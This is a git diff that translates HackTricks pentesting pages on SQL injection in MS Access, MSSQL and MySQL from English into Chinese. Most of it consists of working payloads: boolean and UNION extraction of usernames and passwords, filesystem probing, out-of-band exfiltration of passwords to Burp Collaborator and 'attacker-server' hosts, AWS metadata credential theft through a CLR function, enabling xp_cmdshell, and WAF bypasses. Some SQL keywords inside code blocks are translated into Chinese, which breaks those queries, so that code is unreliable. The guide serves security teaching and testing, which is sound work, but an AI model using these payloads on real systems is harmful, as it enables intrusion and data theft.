+### WAF 绕过建议工具
 
 {% embed url="https://github.com/m4ll0k/Atlas" %}
 
-## Other Guides
+## 其他指南
 
 - [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
 
-## Brute-Force Detection List
+## 暴力破解检测列表
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
 
@@ -566,9 +492,8 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。这个大会的 **使命是促进技术知识**，是各个学科技术和网络安全专业人士的一个热烈交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/cypher-injection-neo4j.md b/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
index 00dcf2c46..c77da27d9 100644
--- a/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
+++ b/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
@@ -2,10 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check the following blogs:
+查看以下博客：
 
 - [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)
 - [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index f54981693..a1fda2dac 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -2,195 +2,166 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Online Playground
+## 在线游乐场
 
 - [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
 
-## DB Limitations
+## 数据库限制
 
-### String Concatenation
-
-String concatenation is possible with `& (%26)` and `+ (%2b)` characters.
+### 字符串连接
 
+字符串连接可以使用 `& (%26)` 和 `+ (%2b)` 字符。
 ```sql
 1' UNION SELECT 'web' %2b 'app' FROM table%00
 1' UNION SELECT 'web' %26 'app' FROM table%00
 ```
+### 评论
 
-### Comments
-
-There are no comments in MS access, but apparently it's possible to remove the last of a query with a NULL char:
-
+在 MS Access 中没有评论，但显然可以通过 NULL 字符删除查询的最后部分：
 ```sql
 1' union select 1,2 from table%00
 ```
-
-If this is not working you could always fix the syntax of the query:
-
+如果这不起作用，您可以始终修复查询的语法：
 ```sql
 1' UNION SELECT 1,2 FROM table WHERE ''='
 ```
-
 ### Stacked Queries
 
-They aren't supported.
+它们不被支持。
 
 ### LIMIT
 
-The **`LIMIT`** operator **isn't implemented**. However, it's possible to limit SELECT query results to the **first N table rows using the `TOP` operator**. `TOP` accepts as argument an integer, representing the number of rows to be returned.
-
+**`LIMIT`** 操作符 **未实现**。但是，可以使用 **`TOP` 操作符** 将 SELECT 查询结果限制为 **前 N 行**。`TOP` 接受一个整数作为参数，表示要返回的行数。
 ```sql
 1' UNION SELECT TOP 3 attr FROM table%00
 ```
+就像 TOP 一样，你可以使用 **`LAST`** 来获取 **最后的行**。
 
-Just like TOP you can use **`LAST`** which will get the **rows from the end**.
-
-## UNION Queries/Sub queries
-
-In a SQLi you usually will want to somehow execute a new query to extract information from other tables. MS Access always requires that in **subqueries or extra queries a `FROM` is indicated**.\
-So, if you want to execute a `UNION SELECT` or `UNION ALL SELECT` or a `SELECT` between parenthesis in a condition, you always **need to indicate a `FROM` with a valid table name**.\
-Therefore, you need to know a **valid table name**.
+## UNION 查询/子查询
 
+在 SQLi 中，你通常会想以某种方式执行一个新查询，以从其他表中提取信息。MS Access 总是要求在 **子查询或额外查询中指明 `FROM`**。\
+因此，如果你想执行 `UNION SELECT` 或 `UNION ALL SELECT` 或在条件中使用括号中的 `SELECT`，你总是 **需要指明一个有效的表名 `FROM`**。\
+因此，你需要知道一个 **有效的表名**。
 ```sql
 -1' UNION SELECT username,password from users%00
 ```
-
-### Chaining equals + Substring
+### 链接等于 + 子字符串
 
 > [!WARNING]
-> This will allow you to exfiltrate values of the current table without needing to know the name of the table.
+> 这将允许您在不需要知道表名的情况下提取当前表的值。
 
-**MS Access** allows **weird syntax** such as **`'1'=2='3'='asd'=false`**. As usually the SQL injection will be inside a **`WHERE`** clause we can abuse that.
-
-Imagine you have a SQLi in a MS Access database and you know (or guessed) that one **column name is username**, and thats the field you want to **exfiltrate**. You could check the different responses of the web app when the chaining equals technique is used and potentially exfiltrate content with a **boolean injection** using the **`Mid`** function to get substrings.
+**MS Access** 允许 **奇怪的语法**，例如 **`'1'=2='3'='asd'=false`**。通常，SQL 注入将位于 **`WHERE`** 子句中，我们可以利用这一点。
 
+想象一下，您在 MS Access 数据库中有一个 SQLi，并且您知道（或猜测）某一 **列名是 username**，而这是您想要 **提取** 的字段。您可以检查在使用链接等于技术时，Web 应用程序的不同响应，并可能使用 **`Mid`** 函数通过 **布尔注入** 提取内容。
 ```sql
 '=(Mid(username,1,3)='adm')='
 ```
-
-If you know the **name of the table** and **column** to dump you can use a combination between `Mid` , `LAST` and `TOP` to **leak all the info** via boolean SQLi:
-
+如果你知道 **表的名称** 和 **列** 以进行转储，你可以使用 `Mid`、`LAST` 和 `TOP` 的组合通过布尔 SQLi **泄露所有信息**：
 ```sql
 '=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='
 ```
-
 _Feel free to check this in the online playground._
 
-### Brute-forcing Tables names
-
-Using the chaining equals technique you can also **bruteforce table names** with something like:
+### 暴力破解表名
 
+使用链式等号技术，您还可以**暴力破解表名**，例如：
 ```sql
 '=(select+top+1+'lala'+from+<table_name>)='
 ```
-
-You can also use a more traditional way:
-
+您还可以使用一种更传统的方法：
 ```sql
 -1' AND (SELECT TOP 1 <table_name>)%00
 ```
+_随时可以在在线演示中检查。_
 
-_Feel free to check this in the online playground._
+- Sqlmap 常见表名: [https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt](https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt)
+- 另一个列表在 [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
 
-- Sqlmap common table names: [https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt](https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt)
-- There is another list in [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
-
-### Brute-Forcing Columns names
-
-You can **brute-force current columns names** with the chaining equals trick with:
+### 暴力破解列名
 
+您可以使用链式等号技巧**暴力破解当前列名**：
 ```sql
 '=column_name='
 ```
-
-Or with a **group by**:
-
+或使用 **group by**：
 ```sql
 -1' GROUP BY column_name%00
 ```
-
-Or you can brute-force column names of a **different table** with:
-
+或者你可以使用以下方法对**不同表**的列名进行暴力破解：
 ```sql
 '=(SELECT TOP 1 column_name FROM valid_table_name)='
 
 -1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00
 ```
-
 ### Dumping data
 
-We have already discussed the [**chaining equals technique**](ms-access-sql-injection.md#chaining-equals-+-substring) **to dump data from the current and other tables**. But there are other ways:
-
+我们已经讨论过 [**链式等号技术**](ms-access-sql-injection.md#chaining-equals-+-substring) **从当前和其他表中转储数据**。但还有其他方法：
 ```sql
 IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')
 ```
+简而言之，该查询使用“if-then”语句以便在成功时触发“200 OK”，否则触发“500 Internal Error”。利用TOP 10运算符，可以选择前十个结果。随后使用LAST仅考虑第十个元组。在该值上，使用MID运算符，可以进行简单的字符比较。通过适当更改MID和TOP的索引，我们可以转储所有行的“username”字段的内容。
 
-In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
+### 基于时间
 
-### Time Based
+检查 [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
 
-Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
+### 其他有趣的函数
 
-### Other Interesting functions
+- `Mid('admin',1,1)` 从位置1获取长度为1的子字符串（初始位置为1）
+- `LEN('1234')` 获取字符串的长度
+- `ASC('A')` 获取字符的ascii值
+- `CHR(65)` 从ascii值获取字符串
+- `IIF(1=1,'a','b')` 如果则
+- `COUNT(*)` 计算项目数量
 
-- `Mid('admin',1,1)` get substring from position 1 length 1 (initial position is 1)
-- `LEN('1234')` get length of string
-- `ASC('A')` get ascii value of char
-- `CHR(65)` get string from ascii value
-- `IIF(1=1,'a','b')` if then
-- `COUNT(*)` Count number of items
-
-## Enumerating tables
-
-From [**here**](https://dataedo.com/kb/query/access/list-of-tables-in-the-database) you can see a query to get tables names:
+## 枚举表
 
+从 [**这里**](https://dataedo.com/kb/query/access/list-of-tables-in-the-database) 您可以看到获取表名的查询：
 ```sql
 select MSysObjects.name
 from MSysObjects
 where
-   MSysObjects.type In (1,4,6)
-   and MSysObjects.name not like '~*'
-   and MSysObjects.name not like 'MSys*'
+MSysObjects.type In (1,4,6)
+and MSysObjects.name not like '~*'
+and MSysObjects.name not like 'MSys*'
 order by MSysObjects.name
 ```
+然而，请注意，在您**无法访问读取表 `MSysObjects`** 的情况下，发现 SQL 注入是非常典型的。
 
-However, note that is very typical to find SQL Injections where you **don't have access to read the table `MSysObjects`**.
+## 文件系统访问
 
-## FileSystem access
+### Web 根目录完整路径
 
-### Web Root Directory Full Path
-
-The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
+**Web 根绝对路径的知识可能会促进进一步的攻击**。如果应用程序错误没有完全隐藏，可以通过尝试从不存在的数据库中选择数据来揭示目录路径。
 
 `http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
 
-MS Access responds with an **error message containing the web directory full pathname**.
+MS Access 会返回一个**包含 Web 目录完整路径名的错误消息**。
 
-### File Enumeration
+### 文件枚举
 
-The following attack vector can be used to **inferrer the existence of a file on the remote filesystem**. If the specified file exists, MS Access triggers an error message informing that the database format is invalid:
+以下攻击向量可用于**推断远程文件系统上文件的存在**。如果指定的文件存在，MS Access 会触发一条错误消息，告知数据库格式无效：
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00`
 
-Another way to enumerate files consists into **specifying a database.table item**. **If** the specified **file exists**, MS Access displays a **database format error message**.
+另一种枚举文件的方法是**指定一个 database.table 项**。**如果**指定的**文件存在**，MS Access 会显示一条**数据库格式错误消息**。
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00`
 
-### .mdb File Name Guessing
+### .mdb 文件名猜测
 
-**Database file name (.mdb)** can be inferred with the following query:
+**数据库文件名 (.mdb)** 可以通过以下查询推断：
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
 
-Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
+其中**name\[i] 是一个 .mdb 文件名**，**realTable 是数据库中存在的表**。尽管 MS Access 总是会触发一条错误消息，但可以区分无效文件名和有效的 .mdb 文件名。
 
-### .mdb Password Cracker
+### .mdb 密码破解
 
-[**Access PassView**](https://www.nirsoft.net/utils/accesspv.html) is a free utility that can be used to recover the main database password of Microsoft Access 95/97/2000/XP or Jet Database Engine 3.0/4.0.
+[**Access PassView**](https://www.nirsoft.net/utils/accesspv.html) 是一个免费的实用程序，可用于恢复 Microsoft Access 95/97/2000/XP 或 Jet Database Engine 3.0/4.0 的主数据库密码。
 
-## References
+## 参考文献
 
 - [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md
index c14da86b8..f94eb2298 100644
--- a/src/pentesting-web/sql-injection/mssql-injection.md
+++ b/src/pentesting-web/sql-injection/mssql-injection.md
@@ -1,29 +1,27 @@
-# MSSQL Injection
+# MSSQL 注入
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Active Directory enumeration
+## Active Directory 枚举
 
-It may be possible to **enumerate domain users via SQL injection inside a MSSQL** server using the following MSSQL functions:
-
-- **`SELECT DEFAULT_DOMAIN()`**: Get current domain name.
-- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: If you know the name of the domain (_DOMAIN_ in this example) this function will return the **SID of the user Administrator** in hex format. This will look like `0x01050000000[...]0000f401`, note how the **last 4 bytes** are the number **500** in **big endian** format, which is the **common ID of the user administrator**.\
-  This function will allow you to **know the ID of the domain** (all the bytes except of the last 4).
-- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : This function will return the **username of the ID indicated** (if any), in this case **0000e803** in big endian == **1000** (usually this is the ID of the first regular user ID created). Then you can imagine that you can brute-force user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
+可以通过 SQL 注入在 MSSQL 服务器中**枚举域用户**，使用以下 MSSQL 函数：
 
+- **`SELECT DEFAULT_DOMAIN()`**: 获取当前域名。
+- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: 如果你知道域的名称（在这个例子中是 _DOMAIN_），这个函数将返回**管理员用户的 SID**，以十六进制格式显示。它看起来像 `0x01050000000[...]0000f401`，注意**最后 4 个字节**是**500**的**大端**格式，这是**管理员用户的常见 ID**。\
+这个函数将允许你**知道域的 ID**（除了最后 4 个字节的所有字节）。
+- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : 这个函数将返回**所指示 ID 的用户名**（如果有的话），在这种情况下**0000e803**的大端 == **1000**（通常这是创建的第一个常规用户 ID 的 ID）。然后你可以想象你可以对用户 ID 从 1000 到 2000 进行暴力破解，可能会获取域中所有用户的用户名。例如使用以下函数：
 ```python
 def get_sid(n):
-	domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
-	user = struct.pack('<I', int(n))
-	user = user.hex()
-	return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
+domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
+user = struct.pack('<I', int(n))
+user = user.hex()
+return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
 ```
+## **替代基于错误的向量**
 
-## **Alternative Error-Based vectors**
+基于错误的 SQL 注入通常类似于 `+AND+1=@@version--` 这样的构造，以及基于 «OR» 操作符的变体。包含此类表达式的查询通常会被 WAF 阻止。作为绕过方法，使用 %2b 字符连接一个字符串与触发数据类型转换错误的特定函数调用的结果。
 
-Error-based SQL injections typically resemble constructions such as `+AND+1=@@version--` and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.
-
-Some examples of such functions:
+一些此类函数的示例：
 
 - `SUSER_NAME()`
 - `USER_NAME()`
@@ -33,22 +31,19 @@ Some examples of such functions:
 - `TYPE_NAME()`
 - `COL_NAME()`
 
-Example use of function `USER_NAME()`:
-
+函数 `USER_NAME()` 的示例用法：
 ```
 https://vuln.app/getItem?id=1'%2buser_name(@@version)--
 ```
-
 ![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/6.png)
 
 ## SSRF
 
-These SSRF tricks [were taken from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
+这些 SSRF 技巧 [来自这里](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
 
 ### `fn_xe_file_target_read_file`
 
-It requires **`VIEW SERVER STATE`** permission on the server.
-
+它需要服务器上的 **`VIEW SERVER STATE`** 权限。
 ```
 https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
 ```
@@ -60,11 +55,9 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERV
 Use master;
 EXEC sp_helprotect 'fn_xe_file_target_read_file';
 ```
-
 ### `fn_get_audit_file`
 
-It requires the **`CONTROL SERVER`** permission.
-
+它需要 **`CONTROL SERVER`** 权限。
 ```
 https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
 ```
@@ -76,11 +69,9 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL S
 Use master;
 EXEC sp_helprotect 'fn_get_audit_file';
 ```
-
 ### `fn_trace_gettabe`
 
-It requires the **`CONTROL SERVER`** permission.
-
+它需要 **`CONTROL SERVER`** 权限。
 ```
 https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
 ```
@@ -92,77 +83,67 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL S
 Use master;
 EXEC sp_helprotect 'fn_trace_gettabe';
 ```
-
 ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
 
-Stored procedures like `xp_dirtree`, though not officially documented by Microsoft, have been described by others online due to their utility in network operations within MSSQL. These procedures are often used in Out of Band Data exfiltration, as showcased in various [examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) and [posts](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/).
-
-The `xp_dirtree` stored procedure, for instance, is used to make network requests, but it's limited to only TCP port 445. The port number isn't modifiable, but it allows reading from network shares. The usage is demonstrated in the SQL script below:
+像 `xp_dirtree` 这样的存储过程，尽管没有被微软正式文档化，但由于其在 MSSQL 中网络操作的实用性，已被其他人在线描述。这些过程通常用于带外数据外泄，如各种 [examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) 和 [posts](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) 中所展示的。
 
+例如，`xp_dirtree` 存储过程用于发起网络请求，但仅限于 TCP 端口 445。端口号不可修改，但允许从网络共享读取。用法在下面的 SQL 脚本中演示：
 ```sql
 DECLARE @user varchar(100);
 SELECT @user = (SELECT user);
 EXEC ('master..xp_dirtree "\\' + @user + '.attacker-server\\aa"');
 ```
+值得注意的是，这种方法可能并不适用于所有系统配置，例如在默认设置下运行的 `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` 和 `Windows Server 2016 Datacenter`。
 
-It's noteworthy that this method might not work on all system configurations, such as on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` running on a `Windows Server 2016 Datacenter` with default settings.
-
-Additionally, there are alternative stored procedures like `master..xp_fileexist` and `xp_subdirs` that can achieve similar outcomes. Further details on `xp_fileexist` can be found in this [TechNet article](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx).
+此外，还有其他存储过程，如 `master..xp_fileexist` 和 `xp_subdirs`，可以实现类似的结果。有关 `xp_fileexist` 的更多详细信息，请参见这篇 [TechNet article](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx)。
 
 ### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>
 
-Obviously you could also use **`xp_cmdshell`** to **execute** something that triggers a **SSRF**. For more info **read the relevant section** in the page:
+显然，您还可以使用 **`xp_cmdshell`** 来 **执行** 触发 **SSRF** 的操作。有关更多信息，请 **阅读相关部分**：
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/
 {{#endref}}
 
-### MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
+### MSSQL 用户自定义函数 - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
 
-Creating a CLR UDF (Common Language Runtime User Defined Function), which is code authored in any .NET language and compiled into a DLL, to be loaded within MSSQL for executing custom functions, is a process that requires `dbo` access. This means it is usually feasible only when the database connection is made as `sa` or with an Administrator role.
+创建 CLR UDF（公共语言运行时用户自定义函数），即用任何 .NET 语言编写并编译成 DLL 的代码，以便在 MSSQL 中加载以执行自定义函数，是一个需要 `dbo` 访问权限的过程。这意味着通常只有在以 `sa` 或管理员角色进行数据库连接时才可行。
 
-A Visual Studio project and installation instructions are provided in [this Github repository](https://github.com/infiniteloopltd/SQLHttp) to facilitate the loading of the binary into MSSQL as a CLR assembly, thereby enabling the execution of HTTP GET requests from within MSSQL.
-
-The core of this functionality is encapsulated in the `http.cs` file, which employs the `WebClient` class to execute a GET request and retrieve content as illustrated below:
+在 [这个 Github repository](https://github.com/infiniteloopltd/SQLHttp) 中提供了 Visual Studio 项目和安装说明，以便将二进制文件作为 CLR 程序集加载到 MSSQL 中，从而实现从 MSSQL 内部执行 HTTP GET 请求。
 
+此功能的核心封装在 `http.cs` 文件中，该文件使用 `WebClient` 类执行 GET 请求并检索内容，如下所示：
 ```csharp
 using System.Data.SqlTypes;
 using System.Net;
 
 public partial class UserDefinedFunctions
 {
-    [Microsoft.SqlServer.Server.SqlFunction]
-    public static SqlString http(SqlString url)
-    {
-        var wc = new WebClient();
-        var html = wc.DownloadString(url.Value);
-        return new SqlString(html);
-    }
+[Microsoft.SqlServer.Server.SqlFunction]
+public static SqlString http(SqlString url)
+{
+var wc = new WebClient();
+var html = wc.DownloadString(url.Value);
+return new SqlString(html);
+}
 }
 ```
-
-Before executing the `CREATE ASSEMBLY` SQL command, it is advised to run the following SQL snippet to add the SHA512 hash of the assembly to the server's list of trusted assemblies (viewable via `select * from sys.trusted_assemblies;`):
-
+在执行 `CREATE ASSEMBLY` SQL 命令之前，建议运行以下 SQL 代码片段，将程序集的 SHA512 哈希添加到服务器的受信任程序集列表中（可通过 `select * from sys.trusted_assemblies;` 查看）：
 ```sql
 EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
 ```
-
-After successfully adding the assembly and creating the function, the following SQL code can be utilized to perform HTTP requests:
-
+成功添加程序集并创建函数后，可以使用以下 SQL 代码执行 HTTP 请求：
 ```sql
 DECLARE @url varchar(max);
 SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
 SELECT dbo.http(@url);
 ```
+### **快速利用：在单个查询中检索整个表的内容**
 
-### **Quick Exploitation: Retrieving Entire Table Contents in a Single Query**
+[Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)。
 
-[Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/).
-
-A concise method for extracting the full content of a table in a single query involves utilizing the `FOR JSON` clause. This approach is more succinct than using the `FOR XML` clause, which requires a specific mode like "raw". The `FOR JSON` clause is preferred for its brevity.
-
-Here's how to retrieve the schema, tables, and columns from the current database:
+提取表的完整内容的简洁方法涉及使用 `FOR JSON` 子句。与需要特定模式如“raw”的 `FOR XML` 子句相比，这种方法更简洁。由于其简洁性，`FOR JSON` 子句更受欢迎。
 
+以下是如何从当前数据库检索模式、表和列：
 ````sql
 https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
 In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:
@@ -228,37 +209,37 @@ SELECT 'a' SELECT 'b'
 So for example, multiple queries such as:
 
 ```sql
-use [tempdb]
-create table [test] ([id] int)
-insert [test] values(1)
-select [id] from [test]
-drop table[test]
+使用 [tempdb]
+创建表 [test] ([id] int)
+插入 [test] 值(1)
+选择 [id] 从 [test]
+删除表 [test]
 ```
 
 Can be reduced to:
 
 ```sql
-use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
+使用[tempdb]创建/**/表[test]([id]int)插入[test]值(1)选择[id]从[test]删除/**/表[test]
 ```
 
 Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:
 
 ```
-# Adding a useless exec() at the end and making the WAF think this isn't a valid querie
+# 在末尾添加一个无用的 exec() 并让 WAF 认为这不是一个有效的查询
 admina'union select 1,'admin','testtest123'exec('select 1')--
-## This will be:
+## 这将是：
 SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
 exec('select 1')--'
 
-# Using weirdly built queries
+# 使用奇怪构建的查询
 admin'exec('update[users]set[password]=''a''')--
-## This will be:
+## 这将是：
 SELECT id, username, password FROM users WHERE username = 'admin'
 exec('update[users]set[password]=''a''')--'
 
-# Or enabling xp_cmdshell
+# 或者启用 xp_cmdshell
 admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
-## This will be
+## 这将是
 select * from users where username = ' admin'
 exec('sp_configure''show advanced option'',''1''reconfigure')
 exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
@@ -270,4 +251,3 @@ exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
 - [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index 12c66e8ec..5eaf912e3 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -1,15 +1,14 @@
-# MySQL injection
+# MySQL 注入
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## Comments
-
+## 评论
 ```sql
 -- MYSQL Comment
 # MYSQL Comment
@@ -17,11 +16,9 @@
 /*! MYSQL Special SQL */
 /*!32302 10*/ Comment for MySQL version 3.23.02
 ```
+## 有趣的函数
 
-## Interesting Functions
-
-### Confirm Mysql:
-
+### 确认 Mysql：
 ```
 concat('a','b')
 database()
@@ -35,9 +32,7 @@ floor(2.9)
 length(1)
 count(1)
 ```
-
-### Useful functions
-
+### 有用的函数
 ```sql
 SELECT hex(database())
 SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
@@ -53,37 +48,30 @@ SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
 SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
